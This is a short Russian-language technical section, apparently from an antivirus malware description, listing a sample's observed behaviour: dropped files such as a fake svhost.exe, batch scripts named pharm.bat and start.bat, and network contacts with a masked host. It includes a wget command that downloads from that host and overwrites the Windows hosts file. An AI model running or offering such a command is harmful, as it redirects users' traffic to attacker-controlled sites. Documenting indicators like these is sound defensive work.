Техническая информация
- <Текущая директория>\wget.exe http://08##.com/Vwc --output-document=<DRIVERS>\etc\hosts
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\pharm.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\start.bat" "
- %TEMP%\2.tmp\pharm.bat
- <Текущая директория>\wget.exe
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- %TEMP%\1.tmp\start.bat
- %WINDIR%\Temp\svhost.exe
- '08##.com':80
- 08##.com/Vwc
- DNS ASK 08##.com
- ClassName: 'Shell_TrayWnd' WindowName: ''